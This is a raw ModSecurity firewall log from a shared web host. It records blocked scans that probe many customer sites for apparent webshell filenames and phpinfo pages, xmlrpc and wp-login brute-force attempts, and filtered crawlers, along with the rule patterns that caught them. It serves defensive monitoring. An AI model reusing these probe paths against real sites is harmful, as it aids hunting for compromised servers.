[Tue May 26 16:50:31.599592 2026] [security2:error] [pid 817651:tid 817840] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB_dlGRCPPN1dS2y2_ZQAAAMA"]
[Tue May 26 16:50:32.320989 2026] [security2:error] [pid 823496:tid 823746] [client 20.206.111.149:30113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/file30.php"] [unique_id "ahWCAJa08mrtyBNpA4PhNQAAAHY"]
[Tue May 26 16:50:32.321105 2026] [security2:error] [pid 823496:tid 823746] [client 20.206.111.149:30113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/file30.php"] [unique_id "ahWCAJa08mrtyBNpA4PhNQAAAHY"]
[Tue May 26 16:50:32.898681 2026] [security2:error] [pid 823496:tid 823704] [client 41.220.17.62:57110] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCAJa08mrtyBNpA4PhNAAAAEw"], referer: http://panda-eco.com/hello-world/
[Tue May 26 16:50:33.111148 2026] [security2:error] [pid 823496:tid 823704] [client 41.220.17.62:57110] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCAJa08mrtyBNpA4PhNAAAAEw"], referer: http://panda-eco.com/hello-world/
[Tue May 26 16:50:33.111197 2026] [security2:error] [pid 823496:tid 823704] [client 41.220.17.62:57110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "panda-eco.com"] [uri "/wp-comments-post.php"] [unique_id "ahWCAJa08mrtyBNpA4PhNAAAAEw"], referer: http://panda-eco.com/hello-world/
[Tue May 26 16:50:33.402455 2026] [security2:error] [pid 817651:tid 817799] [client 20.206.111.149:39085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/yellow.php"] [unique_id "ahWCAdlGRCPPN1dS2y2_xgAAAJc"]
[Tue May 26 16:50:33.402554 2026] [security2:error] [pid 817651:tid 817799] [client 20.206.111.149:39085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/yellow.php"] [unique_id "ahWCAdlGRCPPN1dS2y2_xgAAAJc"]
[Tue May 26 16:50:33.507469 2026] [security2:error] [pid 817651:tid 817887] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWB_9lGRCPPN1dS2y2_hAAAAO8"]
[Tue May 26 16:50:33.821107 2026] [security2:error] [pid 817651:tid 817816] [client 117.198.37.168:54091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCAdlGRCPPN1dS2y2_yQAAAKg"]
[Tue May 26 16:50:33.821218 2026] [security2:error] [pid 817651:tid 817816] [client 117.198.37.168:54091] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCAdlGRCPPN1dS2y2_yQAAAKg"]
[Tue May 26 16:50:34.184563 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.149:32631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/reze.php"] [unique_id "ahWCAtlGRCPPN1dS2y2_zgAAALM"]
[Tue May 26 16:50:34.184738 2026] [security2:error] [pid 817651:tid 817827] [client 20.206.111.149:32631] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/reze.php"] [unique_id "ahWCAtlGRCPPN1dS2y2_zgAAALM"]
[Tue May 26 16:50:34.599825 2026] [security2:error] [pid 823496:tid 823682] [client 114.119.138.154:35571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/libreria-/38-libro-quieres-ser-un-lider.html"] [unique_id "ahWCApa08mrtyBNpA4PhPgAAADY"], referer: http://politica-global.com/
[Tue May 26 16:50:34.975339 2026] [security2:error] [pid 817651:tid 817819] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCAdlGRCPPN1dS2y2_xAAAAKs"]
[Tue May 26 16:50:35.078923 2026] [security2:error] [pid 817651:tid 817879] [client 20.206.111.149:48177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWCA9lGRCPPN1dS2y3ABQAAAOc"]
[Tue May 26 16:50:35.079050 2026] [security2:error] [pid 817651:tid 817879] [client 20.206.111.149:48177] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wefile.php"] [unique_id "ahWCA9lGRCPPN1dS2y3ABQAAAOc"]
[Tue May 26 16:50:35.612280 2026] [security2:error] [pid 823496:tid 823736] [client 20.206.111.149:32625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/xda.php"] [unique_id "ahWCA5a08mrtyBNpA4PhRgAAAGw"]
[Tue May 26 16:50:35.612386 2026] [security2:error] [pid 823496:tid 823736] [client 20.206.111.149:32625] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/xda.php"] [unique_id "ahWCA5a08mrtyBNpA4PhRgAAAGw"]
[Tue May 26 16:50:36.000803 2026] [security2:error] [pid 817651:tid 817898] [client 20.206.111.149:40972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/revealability.php"] [unique_id "ahWCBNlGRCPPN1dS2y3ACgAAAPo"]
[Tue May 26 16:50:36.000876 2026] [security2:error] [pid 817651:tid 817898] [client 20.206.111.149:40972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/revealability.php"] [unique_id "ahWCBNlGRCPPN1dS2y3ACgAAAPo"]
[Tue May 26 16:50:36.450601 2026] [security2:error] [pid 817651:tid 817784] [client 20.206.111.149:63775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/forbidals.php"] [unique_id "ahWCBNlGRCPPN1dS2y3ADwAAAIg"]
[Tue May 26 16:50:36.450727 2026] [security2:error] [pid 817651:tid 817784] [client 20.206.111.149:63775] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/forbidals.php"] [unique_id "ahWCBNlGRCPPN1dS2y3ADwAAAIg"]
[Tue May 26 16:50:37.208089 2026] [security2:error] [pid 823496:tid 823748] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCA5a08mrtyBNpA4PhSAAAAHg"]
[Tue May 26 16:50:37.744683 2026] [security2:error] [pid 817651:tid 817862] [client 196.41.84.135:19398] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWCBdlGRCPPN1dS2y3AGQAA1io"], referer: https://obinnawrites.com/
[Tue May 26 16:50:37.840674 2026] [security2:error] [pid 817651:tid 817806] [client 20.206.111.149:2188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/i.php"] [unique_id "ahWCBdlGRCPPN1dS2y3AGwAAAJ4"]
[Tue May 26 16:50:37.840793 2026] [security2:error] [pid 817651:tid 817806] [client 20.206.111.149:2188] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/i.php"] [unique_id "ahWCBdlGRCPPN1dS2y3AGwAAAJ4"]
[Tue May 26 16:50:38.566874 2026] [security2:error] [pid 823496:tid 823709] [client 20.206.111.149:2444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/900.php"] [unique_id "ahWCBpa08mrtyBNpA4PhawAAAFE"]
[Tue May 26 16:50:38.567023 2026] [security2:error] [pid 823496:tid 823709] [client 20.206.111.149:2444] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/900.php"] [unique_id "ahWCBpa08mrtyBNpA4PhawAAAFE"]
[Tue May 26 16:50:38.815935 2026] [security2:error] [pid 817651:tid 817885] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCBdlGRCPPN1dS2y3AFQAAAO0"]
[Tue May 26 16:50:39.187659 2026] [security2:error] [pid 823496:tid 823752] [client 20.206.111.149:63797] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahWCB5a08mrtyBNpA4PhdQAAAHw"]
[Tue May 26 16:50:39.187766 2026] [security2:error] [pid 823496:tid 823752] [client 20.206.111.149:63797] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/kj.php"] [unique_id "ahWCB5a08mrtyBNpA4PhdQAAAHw"]
[Tue May 26 16:50:39.630784 2026] [security2:error] [pid 817651:tid 817800] [client 20.206.111.149:39043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wuasr.php"] [unique_id "ahWCB9lGRCPPN1dS2y3AMAAAAJg"]
[Tue May 26 16:50:39.630878 2026] [security2:error] [pid 817651:tid 817800] [client 20.206.111.149:39043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wuasr.php"] [unique_id "ahWCB9lGRCPPN1dS2y3AMAAAAJg"]
[Tue May 26 16:50:39.704721 2026] [security2:error] [pid 817651:tid 817736] [remote 129.146.222.51:58918] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bloggertarget.com"] [uri "/"] [unique_id "ahWCB9lGRCPPN1dS2y3AMQAAl1Q"]
[Tue May 26 16:50:40.681066 2026] [security2:error] [pid 817651:tid 817835] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCB9lGRCPPN1dS2y3ALAAAALs"]
[Tue May 26 16:50:40.751530 2026] [security2:error] [pid 823496:tid 823680] [client 20.206.111.149:28247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahWCCJa08mrtyBNpA4PhiQAAADQ"]
[Tue May 26 16:50:40.751668 2026] [security2:error] [pid 823496:tid 823680] [client 20.206.111.149:28247] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/t.php"] [unique_id "ahWCCJa08mrtyBNpA4PhiQAAADQ"]
[Tue May 26 16:50:41.680924 2026] [security2:error] [pid 823496:tid 823666] [client 20.206.111.149:28258] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahWCCZa08mrtyBNpA4PhlQAAACY"]
[Tue May 26 16:50:41.681029 2026] [security2:error] [pid 823496:tid 823666] [client 20.206.111.149:28258] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahWCCZa08mrtyBNpA4PhlQAAACY"]
[Tue May 26 16:50:42.787848 2026] [security2:error] [pid 817651:tid 817844] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCCdlGRCPPN1dS2y3AOwAAAMQ"]
[Tue May 26 16:50:43.228683 2026] [security2:error] [pid 817651:tid 817904] [client 20.206.111.149:63785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-slss.php"] [unique_id "ahWCC9lGRCPPN1dS2y3ATQAAAQA"]
[Tue May 26 16:50:43.228846 2026] [security2:error] [pid 817651:tid 817904] [client 20.206.111.149:63785] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/wp-slss.php"] [unique_id "ahWCC9lGRCPPN1dS2y3ATQAAAQA"]
[Tue May 26 16:50:44.256865 2026] [security2:error] [pid 823496:tid 823723] [client 117.198.37.168:54477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCDJa08mrtyBNpA4PhqAAAAF8"]
[Tue May 26 16:50:44.257017 2026] [security2:error] [pid 823496:tid 823723] [client 117.198.37.168:54477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWCDJa08mrtyBNpA4PhqAAAAF8"]
[Tue May 26 16:50:44.661526 2026] [security2:error] [pid 817651:tid 817897] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCC9lGRCPPN1dS2y3AUwAAAPk"]
[Tue May 26 16:50:45.782004 2026] [security2:error] [pid 823496:tid 823633] [client 20.206.111.149:29456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWCDZa08mrtyBNpA4PhtQAAAAU"]
[Tue May 26 16:50:45.782093 2026] [security2:error] [pid 823496:tid 823633] [client 20.206.111.149:29456] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/crgio.php"] [unique_id "ahWCDZa08mrtyBNpA4PhtQAAAAU"]
[Tue May 26 16:50:45.835156 2026] [security2:error] [pid 817651:tid 817681] [remote 178.156.182.155:42512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWCDdlGRCPPN1dS2y3AcgAAwx0"]
[Tue May 26 16:50:46.079249 2026] [security2:error] [pid 823496:tid 823741] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCDJa08mrtyBNpA4PhrwAAAHE"]
[Tue May 26 16:50:46.902843 2026] [security2:error] [pid 823496:tid 823711] [client 85.11.167.49:57091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/phpinfo.php"] [unique_id "ahWCDpa08mrtyBNpA4PhyQAAAFM"]
[Tue May 26 16:50:47.202159 2026] [security2:error] [pid 817651:tid 817889] [client 85.11.167.49:57291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/test.php"] [unique_id "ahWCD9lGRCPPN1dS2y3AfgAAAPE"]
[Tue May 26 16:50:47.576902 2026] [security2:error] [pid 823496:tid 823703] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCD5a08mrtyBNpA4Ph2QAAAEs"], referer: https://www.anujtradingco.com/
[Tue May 26 16:50:47.839049 2026] [security2:error] [pid 823496:tid 823749] [client 85.11.167.49:57386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/info.php"] [unique_id "ahWCD5a08mrtyBNpA4Ph4AAAAHk"]
[Tue May 26 16:50:48.145826 2026] [security2:error] [pid 817651:tid 817859] [client 85.11.167.49:57612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/php.php"] [unique_id "ahWCENlGRCPPN1dS2y3AhgAAANM"]
[Tue May 26 16:50:48.196335 2026] [security2:error] [pid 823496:tid 823732] [client 20.206.111.149:2778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/Okxob.php"] [unique_id "ahWCEJa08mrtyBNpA4Ph5wAAAGg"]
[Tue May 26 16:50:48.196450 2026] [security2:error] [pid 823496:tid 823732] [client 20.206.111.149:2778] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redi.redirefr.com.md-74.webhostbox.net"] [uri "/Okxob.php"] [unique_id "ahWCEJa08mrtyBNpA4Ph5wAAAGg"]
[Tue May 26 16:50:48.322648 2026] [security2:error] [pid 823496:tid 823746] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWCEJa08mrtyBNpA4Ph6QAAAHY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1157062&moderation-hash=c23f0f591a039229d82b3f206724dd57
[Tue May 26 16:50:48.354227 2026] [security2:error] [pid 823496:tid 823716] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWCD5a08mrtyBNpA4Ph0QAAAFg"]
[Tue May 26 16:50:48.444263 2026] [security2:error] [pid 823496:tid 823651] [client 85.11.167.49:57694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/php_info.php"] [unique_id "ahWCEJa08mrtyBNpA4Ph6gAAABc"]
[Tue May 26 16:50:48.751493 2026] [security2:error] [pid 823496:tid 823700] [client 85.11.167.49:57771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/i.php"] [unique_id "ahWCEJa08mrtyBNpA4Ph7QAAAEg"]
[Tue May 26 16:50:49.059787 2026] [security2:error] [pid 823496:tid 823660] [client 85.11.167.49:57863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "tufello.net"] [uri "/pi.php"] [unique_id "ahWCEZa08mrtyBNpA4Ph8QAAACA"]
